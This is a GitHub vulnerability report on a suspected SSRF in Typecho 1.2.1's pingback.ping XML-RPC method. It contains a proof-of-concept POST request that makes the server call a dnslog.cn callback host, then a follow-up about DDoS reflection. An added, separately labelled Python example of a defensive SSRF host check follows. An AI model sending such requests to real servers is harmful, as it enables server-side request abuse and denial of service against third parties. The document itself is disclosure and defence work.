Hebing123 / cve


Typecho v1.2.1 SSRF vulnerability #11

Open Hebing123 opened 10 months ago

Hebing123 commented 10 months ago

Description

Attackers can pass malicious URLs as parameters to the pingback.ping method by constructing malicious requests. The first parameter in this method allows passing any URL, and the server will send the request with that URL as a parameter. Due to the lack of effective input verification and filtering mechanisms, attackers can exploit this vulnerability to initiate server-side requests, which may lead to security issues such as sensitive information leakage and server resource abuse.

Proof of Concept


POST /index.php/action/xmlrpc HTTP/1.1
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: 192.168.160.147
Connection: Keep-alive

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://npnjie.dnslog.cn/</string></value>
</param>
<param>
<value><string>http://192.168.160.147/index.php/archives/10/</string></value>
</param>
</params>
</methodCall>


Environment in which the problem occurs

Hebing123 commented 10 months ago

According to the description of the relevant personnel, the pingbackPing function in the /var/widget/xmlrpc.php file has already carried out security checks on the destination host using the Common::checkSafeHost() method, restricting access to intranet and reserved addresses. Protocols other than HTTP and HTTPS are restricted.

Therefore, this vulnerability may not exist as an SSRF vulnerability.

However, an attacker may use the Pingback module to carry out DoS or DDoS attacks on other sites. It is so dangerous that it constitutes a security vulnerability. I did not apply for a CVE number for this vulnerability, but it could still evolve into a DoS vulnerability. This is worth noting.

Research data demonstrating possible harm: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/vulnerability/5759/wordpress-xmlrpc-pingback-ddos-vulnerability.
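As an added example, not code from this issue or from Typecho, the following Python shows the kind of destination check the two comments above are discussing: the first comment says the pingback.ping source URL is fetched without validation, the second says Common::checkSafeHost() restricts the scheme to HTTP/HTTPS and rejects intranet and reserved addresses. The function check_safe_host() here is a hypothetical stand-in written from that description; it does not reproduce Typecho's implementation. It validates the scheme, resolves the host, rejects any answer that is not a public address (including IPv4-mapped IPv6 forms), and returns the resolved addresses so the caller can connect to exactly those and not re-resolve (which closes the DNS-rebinding gap a check-then-fetch sequence otherwise leaves open). The DNS table and the public IP 93.184.216.34 are constructed sample data so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Only the two schemes the second comment says checkSafeHost() permits.
ALLOWED_SCHEMES = {"http", "https"}


def _is_public(ip):
    """True only for globally routable unicast addresses.

    ipaddress.is_global already excludes RFC 1918, loopback, link-local,
    CGNAT, documentation and reserved ranges; multicast is excluded explicitly.
    """
    # An IPv4-mapped IPv6 literal (::ffff:127.0.0.1) must be judged as IPv4.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global and not ip.is_multicast


def _system_resolve(host):
    """Default resolver: every A/AAAA answer the OS resolver returns."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def check_safe_host(url, resolve=_system_resolve):
    """Decide whether a pingback source URL may be fetched.

    Returns (ok, reason, addresses). When ok is True, `addresses` are the
    resolved IPs that passed the check; the fetch must connect to one of
    these (pinning) rather than resolving the hostname a second time.
    """
    try:
        parts = urlparse(url)
    except ValueError:
        return False, "unparseable URL", []
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed", []
    host = parts.hostname  # strips userinfo, port and IPv6 brackets
    if not host:
        return False, "missing host", []

    # A literal IP needs no lookup; a hostname is resolved and every answer
    # is checked, because a mixed public/private answer set is how rebinding
    # and split-horizon tricks get an internal address past a single check.
    try:
        candidates = [ipaddress.ip_address(host)]
    except ValueError:
        try:
            candidates = [ipaddress.ip_address(a) for a in resolve(host)]
        except (OSError, ValueError):
            return False, f"cannot resolve {host!r}", []
    if not candidates:
        return False, f"no addresses for {host!r}", []

    rejected = [str(ip) for ip in candidates if not _is_public(ip)]
    if rejected:
        return False, "non-public address(es): " + ", ".join(rejected), []
    return True, "ok", [str(ip) for ip in candidates]


# Constructed DNS table (hypothetical names, sample public IP) so the
# example runs without network access.
CONSTRUCTED_DNS = {
    "blog.example": ["93.184.216.34"],                  # ordinary public site
    "rebind.example": ["93.184.216.34", "10.0.0.5"],    # public + internal answer
}


def constructed_resolve(host):
    """Stand-in for the OS resolver backed by CONSTRUCTED_DNS."""
    try:
        return CONSTRUCTED_DNS[host]
    except KeyError:
        raise socket.gaierror(f"constructed resolver: no record for {host}")


if __name__ == "__main__":
    samples = [
        "http://192.168.160.147/index.php/archives/10/",  # the target host from the PoC
        "http://127.0.0.1:8080/",
        "http://[::ffff:127.0.0.1]/",
        "ftp://blog.example/",
        "http://blog.example/post/1",
        "http://rebind.example/",
    ]
    for u in samples:
        print(u, "->", check_safe_host(u, resolve=constructed_resolve))
```

The pinned address list is the important part of the return value: a check that validates a hostname and then hands the hostname to an HTTP client lets the client resolve again, and a second answer can differ from the first. Redirects need the same treatment, since a public URL that 302s to an internal one bypasses a check applied only to the initial URL; the HTTP client should either not follow redirects or re-run check_safe_host() on each hop. This check says nothing about the DoS concern in the last comment, which is a rate-limiting and per-source-URL throttling question rather than an address-validation one.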